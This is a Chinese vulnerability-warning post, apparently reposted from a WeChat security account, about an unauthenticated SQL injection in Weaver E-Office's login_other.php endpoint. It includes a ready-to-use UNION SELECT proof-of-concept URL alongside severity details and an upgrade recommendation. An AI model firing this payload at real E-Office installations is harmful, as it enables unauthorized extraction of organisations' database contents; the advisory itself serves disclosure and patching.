泛微E-Office SQL注入漏洞 poc

admin

107901
文章

90
评论

2024年6月12日09:38:30评论40 views字数 643阅读2分8秒阅读模式

0x00 漏洞编号

暂无

0x01 危险等级

高危

0x02 漏洞概述

泛微e-office是泛微旗下的一款标准协同移动办公平台。主要面向中小企业,平台全方位覆盖日常办公场景,可以有效提升组织管理与协同效率。

泛微E-Office SQL注入漏洞 poc

0x03 漏洞详情

漏洞类型：SQL注入

影响：获取敏感信息

简述：泛微e-office的/E-mobile/Data/login_other.php接口存在SQL注入漏洞，未授权的攻击者可以通过该漏洞拼接恶意SQL语句，从而获取数据库敏感信息。

0x04 影响版本

泛微E-Office

0x05 POC

{{URL}}/E-mobile/Data/login_other.php?diff=sync&auth={"auths":[{"value":"-1' UNION SELECT 1,2,md5(123456),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}

仅供安全研究与学习之用，若将工具做其他用途，由使用者承担全部法律及连带责任，作者及发布者不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本，建议用户升级到安全版本：

https://www.e-office.cn/

原文始发于微信公众号（浅安安全）：漏洞预警 | 泛微E-Office SQL注入漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

泛微E-Office SQL注入漏洞 poc

暂无

CRMEB电商系统存在SQL注入漏洞【附POC】

Windows核弹级漏洞，Win7-Win11全沦陷(PoC)

Hikvision海康综合安防管理平台applyAutoLoginTicket接口存在远程命令执行漏洞附POC

医药信息管理系统GetLshByTj存在SQL注入漏洞

亿赛通电子文档安全管理系统 UploadFileFromClientServiceForClient 任意文件上传 poc

亿赛通电子文档安全管理系统 ClientAjax 任意文件下载 poc

亿赛通电子文档安全管理系统 UploadFileManagerService 任意文件读取 poc

亿赛通电子文档安全管理系统 UploadFileList 任意文件读取 poc

亿赛通电子文档安全管理系统 RestoreFiles 任意文件读取 poc

亿赛通电子文档安全管理系统 DecryptApplication 任意文件读取 poc

发表评论